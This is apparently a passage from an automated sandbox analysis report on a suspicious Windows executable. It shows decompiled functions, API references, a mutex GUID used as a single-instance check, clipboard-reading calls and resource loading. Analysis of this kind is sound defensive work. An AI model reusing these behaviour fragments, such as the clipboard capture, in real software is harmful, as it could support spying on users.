C:\Users\user\AppData\Local\Temp\New Feature\4.exe, xrefs: 0040D9CD, 0040DA0A

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: 06B$C:\Users\user\AppData\Local\Temp\New Feature\4.exe
API String ID: 0-2751970683
Opcode ID: 5867603207a0a5b9ffe2a1e3b5f175608109187e583c4bb27fcc7161f8e479a0
Instruction ID: a083518367e323c053069df23ee364846155a4f5ae914007cffe7ce6e1671c79
Opcode Fuzzy Hash: 5867603207a0a5b9ffe2a1e3b5f175608109187e583c4bb27fcc7161f8e479a0
Instruction Fuzzy Hash: 684194B1F04214ABCB21EFD98C8199EBBF8EB84310B14007BF505B7281D7798A49DB58

Uniqueness

Uniqueness Score: -1.00%

Function 03F6203A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03F62068
_free.LIBCMT ref: 03F6208E

Strings

0B, xrefs: 03F620F5
x/B, xrefs: 03F620A7

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: _free
String ID: 0B$x/B
API String ID: 269201875-2347037494
Opcode ID: 066da7c02b4448e920422d0fc31efad871bd8ef5acd903bb314981039d46adb0
Instruction ID: 4c8a32dce71ca94fd86672cb8e1bf5983b2b2a48d6e678bf3072796c50505453
Opcode Fuzzy Hash: 066da7c02b4448e920422d0fc31efad871bd8ef5acd903bb314981039d46adb0
Instruction Fuzzy Hash: 9A11E672F04711BADB30DF3DED00B163AA86700331F588666FA15EB1E0DB78C5838644

Uniqueness

Uniqueness Score: -1.00%

Function 0040101C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040101C(void** __ecx) {
				void* _t2;
				long _t3;
				void* _t6;
				void** _t7;

				_t7 = __ecx;
				_t2 = CreateMutexW(0, 0, L"{48D87B02-03F7-4188-8BE8-7733FF2CBCA6}");
				if(_t2 != 0) {
					_t6 = _t2;
					_t3 = GetLastError();
					if(_t3 != 0xb7) {
						 *_t7 = _t6;
						return _t3;
					}
					return CloseHandle(_t6);
				}
				return _t2;
			}

0x0040101e
0x00401029
0x00401031
0x00401033
0x00401035
0x00401040
0x0040104b
0x00000000
0x0040104b
0x00000000
0x00401043
0x0040104f

APIs

CreateMutexW.KERNEL32(00000000,00000000,{48D87B02-03F7-4188-8BE8-7733FF2CBCA6},?,?,00401264), ref: 00401029
GetLastError.KERNEL32 ref: 00401035
CloseHandle.KERNEL32(00000000), ref: 00401043

Strings

{48D87B02-03F7-4188-8BE8-7733FF2CBCA6}, xrefs: 00401022

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID: {48D87B02-03F7-4188-8BE8-7733FF2CBCA6}
API String ID: 4294037311-4023532724
Opcode ID: ce42f1faf4fbd17e7a727f7d3e42eafff64bf53ea0579cca49fa20b08cb3fe63
Instruction ID: 4f44a08466466764496ca51e8dbe2a62fc49c4855a2ddabba53f6954c80d3aa1
Opcode Fuzzy Hash: ce42f1faf4fbd17e7a727f7d3e42eafff64bf53ea0579cca49fa20b08cb3fe63
Instruction Fuzzy Hash: 00D0127160824197D6211B65AC48AAB3979D7A57617104876F441E2591C73CCC81472C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFCA, Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040BFCA(void* __edx, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t74;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t97;
				signed int* _t98;
				signed char* _t100;
				signed int _t105;
				void* _t109;

				E0040A400(__edx, 0x41fbe8, 0x10);
				_t74 = 0;
				_t52 =  *(_t109 + 0x10);
				_t80 = _t52[1];
				if(_t80 == 0 ||  *((intOrPtr*)(_t80 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t83 =  *_t52;
						_t105 =  *(_t109 + 0xc);
						if(_t83 >= 0) {
							_t105 = _t105 + 0xc + _t97;
						}
						 *(_t109 - 4) = _t74;
						_t100 =  *(_t109 + 0x14);
						if(_t83 >= 0 || ( *_t100 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t109 + 8));
							__eflags = _t83 & 0x00000008;
							if((_t83 & 0x00000008) == 0) {
								__eflags =  *_t100 & 0x00000001;
								if(( *_t100 & 0x00000001) == 0) {
									_t83 =  *(_t54 + 0x18);
									__eflags = _t100[0x18] - _t74;
									if(_t100[0x18] != _t74) {
										__eflags = _t83;
										if(_t83 == 0) {
											goto L32;
										} else {
											__eflags = _t105;
											if(_t105 == 0) {
												goto L32;
											} else {
												__eflags =  *_t100 & 0x00000004;
												_t78 = 0;
												_t74 = (_t78 & 0xffffff00 | ( *_t100 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t74;
												 *(_t109 - 0x20) = _t74;
												goto L29;
											}
										}
									} else {
										__eflags = _t83;
										if(_t83 == 0) {
											goto L32;
										} else {
											__eflags = _t105;
											if(_t105 == 0) {
												goto L32;
											} else {
												E0040AF60(_t105, E0040AB21(_t83,  &(_t100[8])), _t100[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t105;
										if(_t105 == 0) {
											goto L32;
										} else {
											E0040AF60(_t105,  *(_t54 + 0x18), _t100[0x14]);
											__eflags = _t100[0x14] - 4;
											if(_t100[0x14] == 4) {
												__eflags =  *_t105;
												if( *_t105 != 0) {
													_push( &(_t100[8]));
													_push( *_t105);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t83 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x423574; // 0x0
							 *((intOrPtr*)(_t109 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x4171ec();
								_t83 =  *((intOrPtr*)(_t109 - 0x1c))();
								L12:
								if(_t83 == 0 || _t105 == 0) {
									L32:
									E0040E8C3(_t74, _t83, _t97, _t100, _t105);
									asm("int3");
									E0040A400(_t97, 0x41fc08, 8);
									_t98 =  *(_t109 + 0x10);
									_t84 =  *(_t109 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t102 = _t84 + 0xc + _t98[2];
										__eflags = _t84 + 0xc + _t98[2];
									} else {
										_t102 = _t84;
									}
									 *(_t109 - 4) =  *(_t109 - 4) & 0x00000000;
									_t106 =  *(_t109 + 0x14);
									_push( *(_t109 + 0x14));
									_push(_t98);
									_push(_t84);
									_t76 =  *((intOrPtr*)(_t109 + 8));
									_push( *((intOrPtr*)(_t109 + 8)));
									_t58 = E0040BFCA(_t98, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E0040CCD1(_t102, _t106[0x18], E0040AB21( *((intOrPtr*)(_t76 + 0x18)),  &(_t106[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E0040CCE1(_t102, _t106[0x18], E0040AB21( *((intOrPtr*)(_t76 + 0x18)),  &(_t106[8])), 1);
										}
									}
									 *(_t109 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0x10));
									return _t61;
								} else {
									 *_t105 = _t83;
									_push( &(_t100[8]));
									_push(_t83);
									L21:
									 *_t105 = E0040AB21();
									L29:
									 *(_t109 - 4) = 0xfffffffe;
									_t53 = _t74;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x0040bfd1
0x0040bfd6
0x0040bfd8
0x0040bfdb
0x0040bfe0
0x0040c0f0
0x0040c0f0
0x0040c0f0
0x00000000
0x0040bfef
0x0040bfef
0x0040bff4
0x0040bffe
0x0040c000
0x0040c005
0x0040c00a
0x0040c00a
0x0040c00c
0x0040c00f
0x0040c014
0x0040c036
0x0040c036
0x0040c039
0x0040c03c
0x0040c05a
0x0040c05d
0x0040c09c
0x0040c09f
0x0040c0a2
0x0040c0c7
0x0040c0c9
0x00000000
0x0040c0cb
0x0040c0cb
0x0040c0cd
0x00000000
0x0040c0cf
0x0040c0cf
0x0040c0d4
0x0040c0d8
0x0040c0d8
0x0040c0d9
0x00000000
0x0040c0d9
0x0040c0cd
0x0040c0a4
0x0040c0a4
0x0040c0a6
0x00000000
0x0040c0a8
0x0040c0a8
0x0040c0aa
0x00000000
0x0040c0ac
0x0040c0bd
0x00000000
0x0040c0c2
0x0040c0aa
0x0040c0a6
0x0040c05f
0x0040c05f
0x0040c063
0x00000000
0x0040c069
0x0040c069
0x0040c06b
0x00000000
0x0040c071
0x0040c078
0x0040c080
0x0040c084
0x0040c086
0x0040c089
0x0040c08e
0x0040c08f
0x00000000
0x0040c08f
0x0040c089
0x00000000
0x0040c084
0x0040c06b
0x0040c063
0x0040c03e
0x0040c03e
0x00000000
0x0040c03e
0x0040c01b
0x0040c01b
0x0040c020
0x0040c025
0x00000000
0x0040c027
0x0040c029
0x0040c032
0x0040c041
0x0040c043
0x0040c102
0x0040c102
0x0040c107
0x0040c10f
0x0040c114
0x0040c117
0x0040c11a
0x0040c11d
0x0040c126
0x0040c126
0x0040c11f
0x0040c11f
0x0040c11f
0x0040c129
0x0040c12d
0x0040c130
0x0040c131
0x0040c132
0x0040c133
0x0040c136
0x0040c13f
0x0040c13f
0x0040c142
0x0040c178
0x0040c144
0x0040c144
0x0040c144
0x0040c147
0x0040c15e
0x0040c15e
0x0040c147
0x0040c17d
0x0040c187
0x0040c193
0x0040c051
0x0040c051
0x0040c056
0x0040c057
0x0040c091
0x0040c098
0x0040c0dc
0x0040c0dc
0x0040c0e3
0x0040c0f2
0x0040c0f5
0x0040c101
0x0040c101
0x0040c043
0x0040c025
0x00000000
0x00000000
0x00000000
0x0040bff4

APIs

___AdjustPointer.LIBCMT ref: 0040C091
___AdjustPointer.LIBCMT ref: 0040C0B4
___AdjustPointer.LIBCMT ref: 0040C150

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 7f66b5f791e2f8fca1a58d25705b162bd0e545868a1537be32031f5718ad661d
Instruction ID: fcaab6da63b510e4c8934215bea12e1dda13f2f9b457e516294b3438d0325087
Opcode Fuzzy Hash: 7f66b5f791e2f8fca1a58d25705b162bd0e545868a1537be32031f5718ad661d
Instruction Fuzzy Hash: 9551E272604206EFEB288F55D881B6A73A5EF40304F24463FE8056B2D2D739EC91DB99

Uniqueness

Uniqueness Score: -1.00%

Function 03F5C21A, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 03F5C2E1
___AdjustPointer.LIBCMT ref: 03F5C304
___AdjustPointer.LIBCMT ref: 03F5C3A0

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 7f66b5f791e2f8fca1a58d25705b162bd0e545868a1537be32031f5718ad661d
Instruction ID: 66115a822d774afd447487be47e611f54ebb2f87b782189f3993594c0417327a
Opcode Fuzzy Hash: 7f66b5f791e2f8fca1a58d25705b162bd0e545868a1537be32031f5718ad661d
Instruction Fuzzy Hash: EF51AF76A0170AAFDB29CF54D880BAAB7A4EF54310F18417DFE079B6A0E731E841C790

Uniqueness

Uniqueness Score: -1.00%

Function 03F51A0A, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?), ref: 03F51A5D
LoadResource.KERNEL32(?,00000000), ref: 03F51A6F
LockResource.KERNEL32(00000000), ref: 03F51A7E
SizeofResource.KERNEL32(?,00000000), ref: 03F51A88

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 0f82d9bf07c6a41ec84857f235c68ed1e3a19df9d5f185cc67da1d442cfcaf5c
Instruction ID: 21ca76bae6d4b9fb125761c66fcf8313fdca58223c962098652f3f212cf0a4a5
Opcode Fuzzy Hash: 0f82d9bf07c6a41ec84857f235c68ed1e3a19df9d5f185cc67da1d442cfcaf5c
Instruction Fuzzy Hash: 21310AB1E00305ABEB14DFA4DC44BBEBBB9EB44354F094528FA019B351E735A945CA60

Uniqueness

Uniqueness Score: -1.00%

Function 0040F371, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F371(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E0041056D(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E0041056D(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E0040F201(GetLastError());
									_t19 =  *((intOrPtr*)(E0040F237(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E0040F9AD(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0040F201(GetLastError());
						return  *((intOrPtr*)(E0040F237(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E0040F9AD(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E0040F993(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x0040f378
0x0040f37d
0x0040f39b
0x0040f39d
0x0040f3a0
0x0040f3cd
0x0040f3d5
0x0040f3d7
0x0040f3f0
0x0040f3f3
0x0040f3f6
0x0040f404
0x0040f413
0x0040f41b
0x0040f41d
0x0040f436
0x0040f439
0x0040f439
0x0040f41f
0x0040f426
0x0040f431
0x0040f431
0x0040f43b
0x00000000
0x0040f43b
0x0040f3fb
0x0040f400
0x0040f402
0x00000000
0x00000000
0x00000000
0x0040f402
0x0040f3e0
0x00000000
0x0040f3eb
0x0040f3a2
0x0040f3a5
0x0040f3a8
0x0040f3bb
0x0040f3be
0x0040f391
0x0040f391
0x00000000
0x0040f394
0x0040f3ae
0x0040f3b3
0x0040f3b5
0x0040f43f
0x0040f43f
0x00000000
0x0040f3b5
0x0040f37f
0x0040f384
0x0040f389
0x0040f38b
0x0040f38e
0x00000000

APIs

Part of subcall function 0040F993: _free.LIBCMT ref: 0040F9A1

Part of subcall function 0041056D: WideCharToMultiByte.KERNEL32(00000007,00000000,00000000,00000000,00000007,00000000,004139DC,?,00000000,?,00000000,?,0041374B,0000FDE9,00000000,?), ref: 0041060F

GetLastError.KERNEL32 ref: 0040F3D9
__dosmaperr.LIBCMT ref: 0040F3E0
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0040F41F
__dosmaperr.LIBCMT ref: 0040F426

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: ddf9bec2c12101bb9195a60755af7b13839e2140729f83c25927a6f9b45a5af4
Instruction ID: ca33ef56708ca21e7ccacb68f4ebb6e8b171d4970991b10aefccbf3451c4234b
Opcode Fuzzy Hash: ddf9bec2c12101bb9195a60755af7b13839e2140729f83c25927a6f9b45a5af4
Instruction Fuzzy Hash: F121B771604205AFDB30AF628880D6B77ACEF10368350853AFD15B3AD1D739DC468759

Uniqueness

Uniqueness Score: -1.00%

Function 03F5F5C1, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 03F5FBE3: _free.LIBCMT ref: 03F5FBF1

Part of subcall function 03F607BD: WideCharToMultiByte.KERNEL32(00000007,00000000,00000000,00000000,00000007,00000000,03F63C2C,?,00000000,?,00000000,?,03F6399B,0000FDE9,00000000,?), ref: 03F6085F

GetLastError.KERNEL32 ref: 03F5F629
__dosmaperr.LIBCMT ref: 03F5F630
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 03F5F66F
__dosmaperr.LIBCMT ref: 03F5F676

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: ddf9bec2c12101bb9195a60755af7b13839e2140729f83c25927a6f9b45a5af4
Instruction ID: f5297c4eff82ad08668c0ed36cd5e1833a86ca15036d457167c4e02eb9f51987
Opcode Fuzzy Hash: ddf9bec2c12101bb9195a60755af7b13839e2140729f83c25927a6f9b45a5af4
Instruction Fuzzy Hash: 39219275A04306EFDB20EF61CC90D6B77ACAE0826871585D8FF199B160D730EC018B90

Uniqueness

Uniqueness Score: -1.00%

Function 03F6158D, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d61112a7cd760eb8da0dcffd8f3c0aca25ada070fe3ea4630b1bd0f309ae50a
Instruction ID: c666eaba955017ffe81f1c8428d2e4b2ca6491228c928b56719e19e37ef21e1e
Opcode Fuzzy Hash: 6d61112a7cd760eb8da0dcffd8f3c0aca25ada070fe3ea4630b1bd0f309ae50a
Instruction Fuzzy Hash: 1C21067AE41222ABDB31CF24DC45AAA776C9F067A4F1D4160ED06A7291D732DD00C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 03F5D1D2, Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e71028f28aaf39e1470936d711a86c04a8ecfd30948e0dcc296aba3a8958cb83
Instruction ID: 4f01f4b59906feca9cc046a32485e53e6d601cbc609dec70412eb836d7fdf712
Opcode Fuzzy Hash: e71028f28aaf39e1470936d711a86c04a8ecfd30948e0dcc296aba3a8958cb83
Instruction Fuzzy Hash: 6C11C832E47722BBCB32CF64DC84A5A77689F46760B190160FE06AB290D730ED00C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 004096F6, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E004096F6(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, long* _a16) {
				signed int _t12;
				long* _t14;
				struct HWND__* _t17;
				long _t19;
				intOrPtr _t20;

				_t18 = _a8;
				_t14 = _a16;
				_t17 = _a4;
				if(_a8 != 1) {
					_t20 = _a12;
					if(GetWindowLongW(_t17, 0xffffffeb) == 0) {
						return DefWindowProcW();
					}
					return E00409870(_t5, _t18, _t20, _t14);
				}
				_t19 =  *_t14;
				if(_t19 == 0) {
					return 0xffffffffffffffff;
				}
				SetLastError(0);
				if(SetWindowLongW(_t17, 0xffffffeb, _t19) == 0) {
					_t12 = GetLastError();
					asm("sbb eax, eax");
					return  ~_t12;
				}
				return 0;
			}

0x004096fa
0x004096fe
0x00409702
0x00409709
0x00409737
0x00409746
0x00409762
0x00409762
0x00000000
0x0040974d
0x0040970b
0x0040970f
0x00000000
0x00409756
0x00409713
0x00409729
0x0040972b
0x00409733
0x00000000
0x00409733
0x0040975b

APIs

SetLastError.KERNEL32(00000000), ref: 00409713
SetWindowLongW.USER32(?,000000EB,?), ref: 0040971D
GetLastError.KERNEL32 ref: 0040972B
GetWindowLongW.USER32(?,000000EB), ref: 0040973E

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLastLongWindow
String ID:
API String ID: 3631197057-0
Opcode ID: f8c5ca6ca7a7c4e52703b7f9610465da3e9b1b0db8f76d8ff76d58eaace230f7
Instruction ID: 7c28972b4a1e9b807076dc754f8a4762021799c3521e3fd5d1a9bf228401adf2
Opcode Fuzzy Hash: f8c5ca6ca7a7c4e52703b7f9610465da3e9b1b0db8f76d8ff76d58eaace230f7
Instruction Fuzzy Hash: E901D63321C124EFE6406F25AC44D7B77A8EB86765F00467AF916E32D1C7349C018679

Uniqueness

Uniqueness Score: -1.00%

Function 0043B218, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0043B23E

Part of subcall function 0043B026: __fltout2.LIBCMT ref: 0043B052

__cftog_l.LIBCMT ref: 0043B264
__cftoe_l.LIBCMT ref: 0043B296

Memory Dump Source

Source File: 00000010.00000002.392710030.0000000000427000.00000020.00020000.sdmp, Offset: 00427000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction ID: 5449b646b4af609c03f7e5bd0f864950c1530cca3b68f922051c4a7bbf61bc8f
Opcode Fuzzy Hash: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction Fuzzy Hash: 46117E3204014ABBCF125E85CC0A9EE3F22FB1D354F189556FE6858131C33AC9B1AB85

Uniqueness

Uniqueness Score: -1.00%

Function 03F592D6, Relevance: 6.0, APIs: 4, Instructions: 41clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32(0000000D), ref: 03F592DB
GlobalFix.KERNEL32(00000000), ref: 03F592E8
GlobalSize.KERNEL32(00000000), ref: 03F592F5
GlobalUnWire.KERNEL32(00000000), ref: 03F5932A

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: Global$ClipboardDataSizeWire
String ID:
API String ID: 3139867698-0
Opcode ID: f826cbb9f2a219faf9c08d78c157462fb47ce50f780058548b3d01393191027e
Instruction ID: 53ecba3d28515dc9cc1a77242762509e2b0e57fcc89a02ce161eb6c45efa2812
Opcode Fuzzy Hash: f826cbb9f2a219faf9c08d78c157462fb47ce50f780058548b3d01393191027e
Instruction Fuzzy Hash: 0DF03631B19307DB9714DB659C88FBBAA7CEBA165574C8139FE01C62D0DB90D805C2B5

Uniqueness

Uniqueness Score: -1.00%

Function 00414536, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414536(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x423130, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0041451F();
					E004144E1();
					_t13 = WriteConsoleW( *0x423130, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00414553
0x00414557
0x00414564
0x00414569
0x00414584
0x00414584
0x0041458a

APIs

WriteConsoleW.KERNEL32(00000007,00000008,00000000,00000000,00000007,?,00413F8F,00000007,00000001,00000007,00000007,?,00413421,00000000,?,00000007), ref: 0041454D
GetLastError.KERNEL32(?,00413F8F,00000007,00000001,00000007,00000007,?,00413421,00000000,?,00000007,00000000,00000007,?,00413975,00000000), ref: 00414559

Part of subcall function 0041451F: CloseHandle.KERNEL32(FFFFFFFE,00414569,?,00413F8F,00000007,00000001,00000007,00000007,?,00413421,00000000,?,00000007,00000000,00000007), ref: 0041452F

___initconout.LIBCMT ref: 00414569

Part of subcall function 004144E1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00414510,00413F7C,00000007,?,00413421,00000000,?,00000007,00000000), ref: 004144F4

WriteConsoleW.KERNEL32(00000007,00000008,00000000,00000000,?,00413F8F,00000007,00000001,00000007,00000007,?,00413421,00000000,?,00000007,00000000), ref: 0041457E

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 27e5dca2dd1cfa1656925b6fb7e74c7885557edeb390deade6eb2d52166b073c
Instruction ID: cc91fefcdce59a09436b989a2c9c1805c2d4164de683eabd2a20a57574bfcc10
Opcode Fuzzy Hash: 27e5dca2dd1cfa1656925b6fb7e74c7885557edeb390deade6eb2d52166b073c
Instruction Fuzzy Hash: FAF01C36540155BBCF221FD2DC08ADA3F76EF487B1F018065FB1995130DA368960DB98

Uniqueness

Uniqueness Score: -1.00%

Function 03F64786, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000007,00000008,00000000,00000000,00000007,?,03F641DF,00000007,00000001,00000007,00000007,?,03F63671,00000000,?,00000007), ref: 03F6479D
GetLastError.KERNEL32(?,03F641DF,00000007,00000001,00000007,00000007,?,03F63671,00000000,?,00000007,00000000,00000007,?,03F63BC5,00000000), ref: 03F647A9

Part of subcall function 03F6476F: CloseHandle.KERNEL32(00423130,03F647B9,?,03F641DF,00000007,00000001,00000007,00000007,?,03F63671,00000000,?,00000007,00000000,00000007), ref: 03F6477F

___initconout.LIBCMT ref: 03F647B9

Part of subcall function 03F64731: CreateFileW.KERNEL32(0041DAD8,40000000,00000003,00000000,00000003,00000000,00000000,03F64760,03F641CC,00000007,?,03F63671,00000000,?,00000007,00000000), ref: 03F64744

WriteConsoleW.KERNEL32(00000007,00000008,00000000,00000000,?,03F641DF,00000007,00000001,00000007,00000007,?,03F63671,00000000,?,00000007,00000000), ref: 03F647CE

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 27e5dca2dd1cfa1656925b6fb7e74c7885557edeb390deade6eb2d52166b073c
Instruction ID: d1b2e2aaf3f152bfda8408644dbfb62535f6372ebb0ba2b00ad8ed93f050cec0
Opcode Fuzzy Hash: 27e5dca2dd1cfa1656925b6fb7e74c7885557edeb390deade6eb2d52166b073c
Instruction Fuzzy Hash: 97F03036910255BBCF226F92DC049D93F76FF096B1F054160FA1995130D6328930DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E768, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E768() {

				E0040F096( *0x423c0c);
				 *0x423c0c = 0;
				E0040F096( *0x423c10);
				 *0x423c10 = 0;
				E0040F096( *0x4238f0);
				 *0x4238f0 = 0;
				E0040F096( *0x4238f4);
				 *0x4238f4 = 0;
				return 1;
			}

0x0040e771
0x0040e77e
0x0040e784
0x0040e78f
0x0040e795
0x0040e7a0
0x0040e7a6
0x0040e7ae
0x0040e7b7

APIs

_free.LIBCMT ref: 0040E771

Part of subcall function 0040F096: HeapFree.KERNEL32(00000000,00000000,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?), ref: 0040F0AC
Part of subcall function 0040F096: GetLastError.KERNEL32(?,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?,?), ref: 0040F0BE

_free.LIBCMT ref: 0040E784
_free.LIBCMT ref: 0040E795
_free.LIBCMT ref: 0040E7A6

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 41abd5779f1a837d4f070380f7726483b1cd8c659127fb6c28e157d51941b183
Instruction ID: 1fbc669dbd58344a307aad4d79d3d48c8e446f943825d06d2a6ddc0e5fdd9cd0
Opcode Fuzzy Hash: 41abd5779f1a837d4f070380f7726483b1cd8c659127fb6c28e157d51941b183
